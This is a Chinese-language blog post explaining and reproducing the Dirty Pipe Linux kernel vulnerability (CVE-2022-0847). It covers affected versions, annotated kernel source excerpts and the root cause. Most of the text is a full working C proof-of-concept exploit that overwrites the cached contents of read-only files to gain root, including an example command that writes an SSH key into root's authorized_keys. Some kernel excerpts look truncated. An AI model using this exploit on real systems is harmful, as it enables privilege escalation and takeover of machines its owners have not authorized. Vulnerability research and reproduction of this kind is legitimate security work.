CVE-2022-0847漏洞原理及复现

CVE-2022-0847漏洞原理及复现

1.漏洞描述

由于内核中copy_page_to_iter_pipe和push_pipe函数的正确初始化存在缺陷,可能存在旧值,攻击者可以利用此漏洞对任意只读文件缓存页进行覆盖,缓存会在系统内保留一段时间,在这段时间内系统的其他进程访问到的该文件内容都是攻击者修改过的文件缓存区的内容,从而将普通用户权限提升至root权限

2.受影响的linux内核版本

1
5.8 <= Linux Kernel < 5.16.11 / 5.15.25 / 5.10.102

3.源码分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
static size_t pipe_write(struct kiocb *iocb,struct iov_iter *from)
{
    ....
    if (chars && !was_empty) {
        //如果缓存不为空则继续写
                 unsigned int mask = pipe->ring_size - 1;
                 struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
                 int offset = buf->offset + buf->len;

                //这里判断有没有设置PIPE_BUF_FLAG_CAN_MERGE标志位,有该标志位则可以写(如果该位置空间不够则另开一块空间写)
                 if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
                     offset + chars <= PAGE_SIZE) {
                         ret = pipe_buf_confirm(pipe, buf);
                         if (ret)
                                 goto out;
                        //写入内容
                         ret = copy_page_from_iter(buf->page, offset, chars, from);
                         if (unlikely(ret < chars)) {
                                 ret = -EFAULT;
                                 goto out;
                         }

                         buf->len += ret;
                         if (!iov_iter_count(from))
                                 goto out;
                 }
         }

         for (;;) {
                 if (!pipe->readers) {
                         send_sig(SIGPIPE, current, 0);
                         if (!ret)
                                 ret = -EPIPE;
                         break;
                 }

                 head = pipe->head;
}

在调用spice函数的时候会调用copy_page_to_iter_pipe函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
                          struct iov_iter *i)
{
         struct pipe_inode_info *pipe = i->pipe;
         struct pipe_buffer *buf;
         unsigned int p_tail = pipe->tail;
         unsigned int p_mask = pipe->ring_size - 1;
         unsigned int i_head = i->head;
                          buf = &pipe->bufs[i_head & p_mask];
         }
         if (pipe_full(i_head, p_tail, pipe->max_usage))
                 return 0;

         buf->ops = &page_cache_pipe_buf_ops;
         get_page(page);
         //这里没有初始化标志位
         buf->page = page;
         buf->offset = offset;
         buf->len = bytes;

         pipe->head = i_head + 1;
         i->iov_offset = offset + bytes;
         i->head = i_head;
 out:
          i->count -= bytes;
         return bytes;
 }

4.漏洞成因

在调用函数spice的时候,系统会直接将缓存页替换成文件缓存页,并且没有初始化标志位,,由于spice函数在置换缓存页的时候没有对标志位进行初始化,所以该文件缓存页就会被误认为普通的缓存页,如果往管道里面写数据,就会把文件缓存页覆盖,缓存页会在系统内保存一段时间,导致后面访问的进程得到的该文件内容都是攻击者篡改的文件内容,以此可以通过覆盖关键文件达到提权的目的

5.漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}

参考:https://mp.weixin.qq.com/s/6VhWBOzJ7uu80nzFxe5jpg

网络安全
#漏洞复现
CVE-2022-0847漏洞原理及复现
https://dreamaccount.github.io/2022/04/17/CVE-2022-0847漏洞原理及复现/
作者
404NotFound
发布于
2022年4月17日
许可协议